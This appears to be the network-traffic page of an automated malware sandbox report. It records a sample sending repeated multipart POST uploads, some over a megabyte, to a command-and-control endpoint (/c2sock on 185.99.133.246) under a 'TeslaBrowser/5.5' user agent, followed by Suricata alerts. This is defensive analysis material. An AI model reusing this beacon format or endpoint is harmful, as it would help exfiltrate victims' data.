Home
Result
Report
Detail Analysis

Network Analysis

Download pcap

Hosts 1 DNS 0 TCP 1 UDP 3 HTTP(S) 14 ICMP 0 IRC 0 Suricata Snort

IP Address	Status	Action
185.99.133.246	Active	Moloch

Name	Response	Post-Analysis Lookup
No hosts contacted.

TCP Requests
- 192.168.56.103:49162 185.99.133.246:80

UDP Requests

POST 200 http://185.99.133.246/c2sock

REQUEST

POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 13358 Host: 185.99.133.246

RESPONSE

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 18 May 2023 00:49:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5 Connection: keep-alive X-Powered-By: PHP/8.2.4 Set-Cookie: PHPSESSID=phip8qj2oirtgedjmlb5f25f12; expires=Sun, 10 Sep 2023 18:36:24 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

POST 200 http://185.99.133.246/c2sock

REQUEST

POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 447 Host: 185.99.133.246

RESPONSE

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 18 May 2023 00:49:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5 Connection: keep-alive X-Powered-By: PHP/8.2.4 Set-Cookie: PHPSESSID=hfpigu07gv6c10nodg26eagj97; expires=Sun, 10 Sep 2023 18:36:25 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

POST 200 http://185.99.133.246/c2sock

REQUEST

POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 487823 Host: 185.99.133.246

RESPONSE

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 18 May 2023 00:49:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5 Connection: keep-alive X-Powered-By: PHP/8.2.4 Set-Cookie: PHPSESSID=rk0ok65b4ujvtnjun80asqhsht; expires=Sun, 10 Sep 2023 18:36:29 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

POST 200 http://185.99.133.246/c2sock

REQUEST

POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 447 Host: 185.99.133.246

RESPONSE

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 18 May 2023 00:49:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5 Connection: keep-alive X-Powered-By: PHP/8.2.4 Set-Cookie: PHPSESSID=0punfhe7m2ntp9ci1nq4uckaea; expires=Sun, 10 Sep 2023 18:36:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

POST 200 http://185.99.133.246/c2sock

REQUEST

POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 447 Host: 185.99.133.246

RESPONSE

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 18 May 2023 00:49:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5 Connection: keep-alive X-Powered-By: PHP/8.2.4 Set-Cookie: PHPSESSID=er1h30i2gshav4qfah4cu11hj1; expires=Sun, 10 Sep 2023 18:36:31 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

POST 200 http://185.99.133.246/c2sock

REQUEST

POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 23084 Host: 185.99.133.246

RESPONSE

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 18 May 2023 00:49:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5 Connection: keep-alive X-Powered-By: PHP/8.2.4 Set-Cookie: PHPSESSID=54el2196qbjbruan77r697958t; expires=Sun, 10 Sep 2023 18:36:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

POST 200 http://185.99.133.246/c2sock

REQUEST

POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 1360 Host: 185.99.133.246

RESPONSE

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 18 May 2023 00:49:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5 Connection: keep-alive X-Powered-By: PHP/8.2.4 Set-Cookie: PHPSESSID=76ac6dd2nkfsg8u7ulefd8792u; expires=Sun, 10 Sep 2023 18:36:33 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

POST 200 http://185.99.133.246/c2sock

REQUEST

POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 1421700 Host: 185.99.133.246

RESPONSE

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 18 May 2023 00:49:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5 Connection: keep-alive X-Powered-By: PHP/8.2.4 Set-Cookie: PHPSESSID=1d6600fdcq2sa218kmc63ul5uv; expires=Sun, 10 Sep 2023 18:36:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

POST 200 http://185.99.133.246/c2sock

REQUEST

POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 447 Host: 185.99.133.246

RESPONSE

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 18 May 2023 00:49:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5 Connection: keep-alive X-Powered-By: PHP/8.2.4 Set-Cookie: PHPSESSID=3p4an9kp72232ahfbjtihq8uq7; expires=Sun, 10 Sep 2023 18:36:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

POST 200 http://185.99.133.246/c2sock

REQUEST

POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 447 Host: 185.99.133.246

RESPONSE

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 18 May 2023 00:49:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5 Connection: keep-alive X-Powered-By: PHP/8.2.4 Set-Cookie: PHPSESSID=oie88vtlvbd9bl38u1onmegu4o; expires=Sun, 10 Sep 2023 18:36:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

POST 200 http://185.99.133.246/c2sock

REQUEST

POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 20226 Host: 185.99.133.246

RESPONSE

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 18 May 2023 00:50:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5 Connection: keep-alive X-Powered-By: PHP/8.2.4 Set-Cookie: PHPSESSID=me456r6vo9tklsuse5asm1o15p; expires=Sun, 10 Sep 2023 18:36:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

POST 200 http://185.99.133.246/c2sock

REQUEST

POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 447 Host: 185.99.133.246

RESPONSE

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 18 May 2023 00:50:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5 Connection: keep-alive X-Powered-By: PHP/8.2.4 Set-Cookie: PHPSESSID=bhpd9t1v9hl8b1a7jbpte0ueng; expires=Sun, 10 Sep 2023 18:36:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

POST 200 http://185.99.133.246/c2sock

REQUEST

POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 447 Host: 185.99.133.246

RESPONSE

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 18 May 2023 00:50:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5 Connection: keep-alive X-Powered-By: PHP/8.2.4 Set-Cookie: PHPSESSID=n27bff49pu3mrsv8amthgud22c; expires=Sun, 10 Sep 2023 18:36:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

POST 200 http://185.99.133.246/c2sock

REQUEST

POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 447 Host: 185.99.133.246

RESPONSE

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 18 May 2023 00:50:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5 Connection: keep-alive X-Powered-By: PHP/8.2.4 Set-Cookie: PHPSESSID=jrael465v5mhbskgsvlo9i7066; expires=Sun, 10 Sep 2023 18:36:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

Flow	SID	Signature	Category
TCP 185.99.133.246:80 -> 192.168.56.103:49162	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode
TCP 185.99.133.246:80 -> 192.168.56.103:49162	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode
TCP 185.99.133.246:80 -> 192.168.56.103:49162	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode
TCP 185.99.133.246:80 -> 192.168.56.103:49162	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode
TCP 185.99.133.246:80 -> 192.168.56.103:49162	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode
TCP 185.99.133.246:80 -> 192.168.56.103:49162	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts